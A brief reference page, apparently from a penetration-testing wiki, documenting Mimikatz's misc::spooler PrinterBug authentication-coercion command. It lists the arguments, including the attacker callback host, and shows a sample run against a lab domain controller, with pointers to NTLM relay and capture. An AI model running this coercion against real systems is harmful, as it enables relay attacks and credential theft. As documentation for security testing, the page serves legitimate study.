misc::spooler is Mimikat's implementation of the MS-RPRN abuse (PrinterBug), an authentication coercion technique. It has the following command line arguments:

  • /authuser: the User Principal Name (UPN). By default it uses the current user's token

  • /authpassword: the password of the user

  • /noauth: use null session

  • /endpoint: the RPC endpoint. By default is uses \pipe\spoolss

  • /server or /target: the target server

  • /connect or /callback: the remote host the target should connect to (attacker host)

mimikatz # misc::spooler /connect:win2019.hacklab.local /server:dc.hacklab.local
[auth ] Default (current)
[ rpc ] Endpoint: \pipe\spoolss
[trans] Disconnect eventual IPC: OK
[trans] Connect to IPC: OK
[ rpc ] Resolve Endpoint: OK

Access is denied (can be OK)

[trans] Disconnect IPC: OK

For more information on how to exploit this, see The Hacker Recipes. It can be used to NTLM relay attacks, NTLM capture, etc.

Last updated